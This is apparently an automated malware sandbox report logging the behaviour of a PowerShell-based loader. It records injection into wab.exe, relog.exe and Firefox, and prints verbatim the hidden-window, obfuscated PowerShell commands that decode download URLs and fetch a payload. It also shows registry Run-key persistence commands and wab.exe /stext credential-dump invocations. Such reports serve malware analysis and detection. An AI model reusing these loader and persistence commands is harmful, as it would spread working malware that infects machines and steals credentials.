Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtMapViewOfSection: Direct from: 0x76F02D1C
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtResumeThread: Direct from: 0x76F036AC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtAllocateVirtualMemory: Direct from: 0x76F02BFC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtReadFile: Direct from: 0x76F02ADC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQuerySystemInformation: Direct from: 0x76F02DFC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtDelayExecution: Direct from: 0x76F02DDC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtQueryInformationProcess: Direct from: 0x76F02C26
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtResumeThread: Direct from: 0x76F02FBC
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	NtCreateUserProcess: Direct from: 0x76F0371C

Maps a DLL or memory area into another process

Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\Windows Mail\wab.exe protection: execute and read and write	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Section loaded: NULL target: C:\Windows\SysWOW64\relog.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe protection: execute and read and write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read write
Source: C:\Windows\SysWOW64\relog.exe	Section loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and write

Modifies the context of a thread in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread register set: target process: 3408

Queues an APC in another process (thread injection)

Source: C:\Windows\SysWOW64\relog.exe

Thread APC queued: target process: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe

Writes to foreign memory regions

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3FA0000	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 73FD94	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3280000
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 327FF8C

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$OvgBalU oRibanaCil H: GS.na	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$Afgiftskolonners42nchamber='SUBsTR';$Apocrisiary++;}$Afgiftskolonners42nchamber+='ing';Function Indbandtes($Forsimple){$Afrettere=$Forsimple.Length-$Apocrisiary;For( $Afgiftskolonners42=2;$Afgiftskolonners42 -lt $Afrettere;$Afgiftskolonners42+=3){$Nedgangene+=$Forsimple.$Afgiftskolonners42nchamber.'Invoke'( $Afgiftskolonners42, $Apocrisiary);}$Nedgangene;}function Sloshily($Parasollernes){ & ($Paprr) ($Parasollernes);}$Velproevet=Indbandtes 'HeMB.o dzM,i.elFil Sa u/Sc5 P. G0Ry n( SW,oi.an.md,to Tw.hs . S.NS,TSe S1.o0Ar.He0Ca; H ,eWHji nnKi6 .4su;Pr TyxBo6,v4G ;Ke UlrD v A: ,1 D2 e1Ch.Pr0Di)Se ,rGr.e Mc ,kB.oFo/Se2Fe0Ca1 B0Su0R 1In0S,1R O,FSliInrMue SfduoAuxF./L,1Zi2Ar1R.. u0al ';$Hennes=Indbandtes ' ,UDisEpeA.rG -GgA eg ,ey.nBytB. ';$Reveled=Indbandtes 'SthF.tSetF.pHos.l:Po/.o/awa ,vUno,rcHyaRelofdNao Dp.oeT r huRe.idcNooC.m.r/NeJDrofyuCos .e ,4Ma. .p n BgA.>Mih.itQttDep os.o:Fr/In/R a vS.oGacSkapilO,dsoo ,p ,eBerS,u.ao enPreAn.SocR.oSymFj/ .JE,oCouArsVieB 4,d.Fap BnB,g , ';$Jejune203=Indbandtes 'Va>In ';$Paprr=Indbandtes 'B,iP,e hx H ';$Gushet='Zaristiske';$Ansvarsbevidsthed = Indbandtes 'FoeAac,vhGuo E Me%CoaG pJ pKudAdaS t Ba,u%,l\LiN ,eskgMalc.iL.gReeP.nBrt P.NoGN.a Bs S He& P& i ,oeA,cOmhB os. Ptul ';Sloshily (Indbandtes ' U$Prg GlVeo.eb a rlGl: .AObrS,n.pi Ln CgFoePa=S,( lc emSmdRe i./SicAl Fi$S,AAbn,as Av oaoprLasBub.reA v Si udalsPotHehUde .dRi) C ');Sloshily (Indbandtes 'Co$Deg TlTaoG.bpeaAclSu:MoBPalSeoJedS.s .kSma tmTesUnf,oo .rSphUnoAllM dInsP,=Sl$ MR Re fvEke rlcaeV dAd.Ves.lpU lPiiVatPa(Ta$DeJKoeDij.nu anSiefe2Ka0 ,3Se)Hy ');Sloshily (Indbandtes ' F[MoNUre tC .AlS.ee .r,hv Mi.kc ,e APLeoIniC,nPet,iMToaBln.eaApgHeeTrr t]D.:Es: eSBreAecKouObr.hisatTuyBePDrr Eo,rt.ao gc no lNa H,=Le M[FoNPae otOp. SChePac .uBerKiiPrtBey,cPt.r oButUnoRec Ho ,lF,TShyPop XeSl]Dr:K :S,T SlFosB.1Ir2To ');$Reveled=$Blodskamsforholds[0];$Lnindeholde= (Indbandtes ',o$ g.il SoRhbLia Kln,: AG Vn,uaChv,oeDer.hi.ee .t es =KaN.ceV.w e-lrOU,b OjTre,ocPrt TST yBls TtG.e FmKr.slNA.e.kt.e.MdW etrbDrCInlSoiAjeOvnGyt');$Lnindeholde+=$Arninge[1];Sloshily ($Lnindeholde);Sloshily (Indbandtes 'Fo$UnG Fn GaC,vFleAfrRaiAdePrt,hs S.KrHAdeDeaLsdS eNyr,rsGe[Ag$UnHK.e snVgnBre Us s]Ov= E$GuV ,eSclMop ,rDroVeer.v eCrtSk ');$Billardkers=Indbandtes 'Sa$.vGUnn,raCovAneU,r oiO,eCatLysn,.CoDCaoBrwP.nTel UoKoa kdRaF ri .lPreMe(.j$HaRNeeDrvO,eFal,nemed B,Fo$PaG Oe Mr omS.a unUniS.eS,sJ.) . ';$Germanies=$Arninge[0];Sloshily (Indbandtes 'Sa$TngSclWhoFob Ba AlC,: ,S .aSta,frE r TaBrnFrdCteMenRa4 c=Di(S T meflsOrt.r-StPScaOrt .hC lu$PrGSkePyr Fmasaman KiS.e,esK,)Bu ');while (!$Saarranden4) {Sloshily (Indbandtes 'Ly$,ugK.lF o sbSuaStlFo:AnN .oafn.yf.oaWevSeoA,r Ga ObEul,ue,r= .$SatM.r CuNoe T ') ;Sloshily $Billardkers;Sloshily (Indbandtes 'MuStotP.a,erU.t -BaS PlMieDueTep e G.4Tr ');Sloshily (Indbandtes 'ge$Ovg	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Negligent.Gas && echo t"	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Andragendet8.vbs"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\nywdnxhzquvbdzxsrjdoxzvr"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\yakooqrtecnnfflwatqqaeiadgh"	Jump to behavior
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe" /stext "C:\Users\user\AppData\Local\Temp\iupgoicvskfsqlharedrlrcrlmrxexz"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Almindeligheden" /t REG_EXPAND_SZ /d "%outoven% -w 1 $Epilabra=(Get-ItemProperty -Path 'HKCU:\Neglective\').Tveboplantes;%outoven% ($Epilabra)"	Jump to behavior
Source: C:\Windows\SysWOW64\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "If (${host}.CurrentUICulture) {$alismataceae='SUBsTR';$Lotah++;}$alismataceae+='ing';Function Viscometres($Rubellosis){$Overdaadigt=$Rubellosis.Length-$Lotah;For( $dekanterendes=2;$dekanterendes -lt $Overdaadigt;$dekanterendes+=3){$Firblads159+=$Rubellosis.$alismataceae.'Invoke'( $dekanterendes, $Lotah);}$Firblads159;}function Tilfredsstillelse($konerne){ . ($Hemibasidiomycetes) ($konerne);}$Annegretes=Viscometres 'BuMVio.lzNyiEfl,ilPraPr/Sn5Te.Fr0f ,l(gaW Ti.anSpds o,aw asFi h N aTAs z1,a0Sy.ud0Bi;bi TpW ,iOpnV,6Te4 C; r Bix P6Ud4Ng; ,trUnv ,: .1Sk2,r1,l.Di0Va),n ,GPre .cSkk oG,/Sm2Fa0R.1Ug0 .0ap1So0 R1Ge VeFS.iSar deStfrioRaxKu/ 1 P2,h1Os. .0 , ';$Milieuplanerne=Viscometres 'YoUVesLreTerPr-W A,rgRhe,yn,ct.u ';$Bageriers=Viscometres 'EnhFotAnt p L:Re/.l/IlcN.p.oaJunS.e lC.-Sma ndD.m ,iOpnT.h uoPesF t E..fcU.oKom.a/DeS PtN emevChnSts T1Ta7 C9Si.R mYoiAux.o ';$Arish=Viscometres 'Se>Re ';$Hemibasidiomycetes=Viscometres 'AmiGeePrxUd ';$Svaerd='Incisal';$dekanterendesndoneser = Viscometres 'w,er,cExh eoCh F %ReaInpCap dL aP,tU.aMo%H.\ChBLie.olAsi Un SdToaDe1Ch0 .3 .XoETofInt,t ,&Co& S SeMec EhS.o,i Gltuf ';Tilfredsstillelse (Viscometres 'Me$.ig olBloEdbGua.llD,:HiSEtt Mo AnS.e Er.foNioLatE = S(ArcTym.edWl M / rc U K$ ndD,e ,k GaKanEftI eOprT.e onOudHne.osTan,idPuo,on LeKes ieNurLs),f ');Tilfredsstillelse (Viscometres 'ta$Ovg klSpoKrbS aUnl ,:JoL ieH v de draneYed TeResBo=I.$ KBZia VgreeR,r,ei eePyr Eshy.TrsT,pErl.aitat,e( .$,oA .rRaiEnsSch O)Ph ');Tilfredsstillelse (Viscometres 'T,[JoN LeKrt.n.VaS e ur v,oiSic .eCaP,co Ki .nKntD,MFiacrn CaVagAse erR ] e:De:,oS eAfcHauFrrF iEntPryTaPLirBeoMet soPecM.o.il K Es=M ,d[ ONSte .tSj. ,SAfeN,cKruT r TiUntcoysoPSkr Aot t oHjc Ao,glBoTFiyBrpQ e.e] C:Va:U.T ,lS.s f1,r2.r ');$Bageriers=$Leveredes[0];$Varmeslangens= (Viscometres 'Cu$Dig wl DoP.bSkaVal :UiLC.iGeg eAnsIntO,iStl Ml ii SnSugFieB,r.nnF.e Lsda=DiNEneP wAn-woOskb TjB,eQ,cM.t PS.ayHus Nt.le Smdi.HiNcheCotfo.NoWExeSpb.mCT,l TiEmeDin Dt');$Varmeslangens+=$Stoneroot[1];Tilfredsstillelse ($Varmeslangens);Tilfredsstillelse (Viscometres 'Or$ oL Gi bgR,eG,sZit Cibrl.ul ,iT.nMigKleNorFonUne s r.GlHree DaPedDie,orBls.f[Af$KoMPaiFelTri se ,u sp Flora.unSte Fr,kn .e,a]Go=Me$MeA Bn,kn ,e PgHir keGat deFesJe ');$Mosegrundene=Viscometres ' E$ .LK.i.rg SeVus,etGii,olP lNei ,nGeg,oeMyrLinDreNas O.flD NoAlwInnSulhyoKraU.dSpFski PlS eKr(kr$ ,BFua cgBneFirReiSte,trHesBr,,r$BeR keFoh ,aRarLidIne ,nFu) D ';$Reharden=$Stoneroot[0];Tilfredsstillelse (Viscometres ',e$ g .lMoo Db ,aEnl R: HFShu osHaiTioEan Bs.daR,aMer.te HnDreNo=Vi(,yTWieVrsF t - .P sa.mt Mh s .o$SvR MePuhBra orRedSpeUnnRe) a ');while (!$Fusionsaarene) {Tilfredsstillelse (Viscometres 'Af$.ogEmlReo SbUna ,lLs: iNBroBon OsBioPrlReuPeb.nlClyFr=C.$MitRarLau eK ') ;Tilfredsstillelse $Mosegrundene;Tilfredsstillelse (Viscometres 'UnS tt Ma.ir Rt a- TSPilS eTreFap V ,
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Belinda103.Eft && echo t"
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
Source: C:\Program Files (x86)\Windows Mail\wab.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\reg.exe REG ADD HKCU\Software\Microsoft\Windows\CurrentVersion\Run /f /v "Bilateralities" /t REG_EXPAND_SZ /d "%Arrestationernes110% -w 1 $Faucals83=(Get-ItemProperty -Path 'HKCU:\sttyskers\').talevant;%Arrestationernes110% ($Faucals83)"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\srdelayed.exe "C:\Windows\SysWOW64\srdelayed.exe"
Source: C:\Program Files (x86)\mEdjCLhGENFaxeOtHHyHLogHIxTeNJwCnROkqpaCmxInxofnfbtq\qeKrnFkDzDT.exe	Process created: C:\Windows\SysWOW64\relog.exe "C:\Windows\SysWOW64\relog.exe"
Source: C:\Windows\SysWOW64\relog.exe	Process created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"

Very long cmdline option found, this is very uncommon (may be encrypted or packed)

Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -windowstyle hidden "if (${host}.currentuiculture) {$afgiftskolonners42nchamber='substr';$apocrisiary++;}$afgiftskolonners42nchamber+='ing';function indbandtes($forsimple){$afrettere=$forsimple.length-$apocrisiary;for( $afgiftskolonners42=2;$afgiftskolonners42 -lt $afrettere;$afgiftskolonners42+=3){$nedgangene+=$forsimple.$afgiftskolonners42nchamber.'invoke'( $afgiftskolonners42, $apocrisiary);}$nedgangene;}function sloshily($parasollernes){ & ($paprr) ($parasollernes);}$velproevet=indbandtes 'hemb.o dzm,i.elfil sa u/sc5 p. g0ry n( sw,oi.an.md,to tw.hs . s.ns,tse s1.o0ar.he0ca; h ,ewhji nnki6 .4su;pr tyxbo6,v4g ;ke ulrd v a: ,1 d2 e1ch.pr0di)se ,rgr.e mc ,kb.ofo/se2fe0ca1 b0su0r 1in0s,1r o,fsliinrmue sfduoauxf./l,1zi2ar1r.. u0al ';$hennes=indbandtes ' ,udisepea.rg -gga eg ,ey.nbytb. ';$reveled=indbandtes 'sthf.tsetf.phos.l:po/.o/awa ,vuno,rchyarelofdnao dp.oet r hure.idcnooc.m.r/nejdrofyucos .e ,4ma. .p n bga.>mih.itqttdep os.o:fr/in/r a vs.ogacskapilo,dsoo ,p ,ebers,u.ao enprean.socr.osymfj/ .je,ocouarsvieb 4,d.fap bnb,g , ';$jejune203=indbandtes 'va>in ';$paprr=indbandtes 'b,ip,e hx h ';$gushet='zaristiske';$ansvarsbevidsthed = indbandtes 'foeaac,vhguo e me%coag pj pkudadas t ba,u%,l\lin ,eskgmalc.il.greep.nbrt p.nogn.a bs s he& p& i ,oea,comhb os. ptul ';sloshily (indbandtes ' u$prg glveo.eb a rlgl: .aobrs,n.pi ln cgfoepa=s,( lc emsmdre i./sical fi$s,aabn,as av oaoprlasbub.rea v si udalspothehude .dri) c ');sloshily (indbandtes 'co$deg tltaog.bpeaaclsu:mobpalseojeds.s .ksma tmtesunf,oo .rsphunoallm dinsp,=sl$ mr re fveke rlcaev dad.ves.lpu lpiivatpa(ta$dejkoedij.nu ansiefe2ka0 ,3se)hy ');sloshily (indbandtes ' f[monure tc .als.ee .r,hv mi.kc ,e apleoinic,npet,imtoabln.eaapgheetrr t]d.:es: esbreaeckouobr.hisattuybepdrr eo,rt.ao gc no lna h,=le m[fonpae otop. schepac .uberkiiprtbey,cpt.r obutunorec ho ,lf,tshypop xesl]dr:k :s,t slfosb.1ir2to ');$reveled=$blodskamsforholds[0];$lnindeholde= (indbandtes ',o$ g.il sorhblia kln,: ag vn,uachv,oeder.hi.ee .t es =kan.cev.w e-lrou,b ojtre,ocprt tst ybls ttg.e 